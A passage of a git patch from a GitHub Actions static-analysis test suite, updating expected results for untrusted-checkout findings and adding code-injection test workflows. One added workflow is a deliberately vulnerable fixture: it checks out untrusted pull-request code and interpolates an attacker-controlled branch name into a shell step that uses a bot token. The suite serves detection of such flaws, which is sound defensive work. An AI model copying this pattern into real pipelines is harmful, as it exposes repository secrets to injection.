.github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b37479..0d5cd4086a71 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,22 +1,22 @@ -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | From 24a3df03869b741d6051194569433b1eb0723b13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:41:23 +0100 Subject: [PATCH 643/707] tests: new tests for Code Injection --- .../.github/workflows/publishResults.yml | 80 +++++++++++++++++++ .../CWE-094/.github/workflows/test22.yml | 12 +++ .../CWE-094/CodeInjectionCritical.expected | 8 ++ 3 files changed, 100 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml new file mode 100644 index 000000000000..17d9680d9074 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -0,0 +1,80 @@ +on: + workflow_call: + inputs: + botGithubId: + description: bot id + type: string + required: true + + secrets: + githubBotPAT: + description: The personal access token + required: true + +permissions: {} # all none + +jobs: + versions-check-result: + name: Publish Results + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion != 'skipped' + steps: + + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: search-patch + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + run_id: context.payload.workflow_run.id, + ...context.repo + }) + let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch') + return artifact?.id + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + if: steps.search-patch.outputs.result + with: + ref: '${{ github.event.workflow_run.head_sha }}' + persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below + + - name: Download git patch + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: fetch-patch + if: steps.search-patch.outputs.result + with: + script: | + let download = await github.rest.actions.downloadArtifact({ + artifact_id: ${{ steps.search-patch.outputs.result }}, + archive_format: 'zip', + ...context.repo + }) + let fs = require('fs') + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data)) + await exec.exec('unzip', ['patch.zip']) + let pr_number = Number(fs.readFileSync('github_pull_request_number.txt')) + core.setOutput('pull_request_number', pr_number) + await io.rmRF('patch.zip') + await io.rmRF('github_pull_request_number.txt') + + - name: Apply and push version increment + id: git-commit + if: steps.search-patch.outputs.result + run: | + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) + echo "file-list<> $GITHUB_OUTPUT + echo "$fileList" >> $GITHUB_OUTPUT + echo "EOF" >> $GITHUB_OUTPUT + + git push \ + "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + env: + BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} + + - name: Add or update information comment + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + if: always() + with: + github-token: ${{ secrets.githubBotPAT }} + script: | + const fileList = `${{ steps.git-commit.outputs.file-list }}` diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml new file mode 100644 index 000000000000..52f7e8964c13 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml @@ -0,0 +1,12 @@ +on: + workflow_run: + workflows: [ 'Pull-Request Checks' ] + types: [ completed ] + +jobs: + publish-results: + uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master + with: + botGithubId: bot + secrets: + githubBotPAT: ${{ secrets.BOT_PAT }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index dad99f0029a2..5187e875cb73 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | 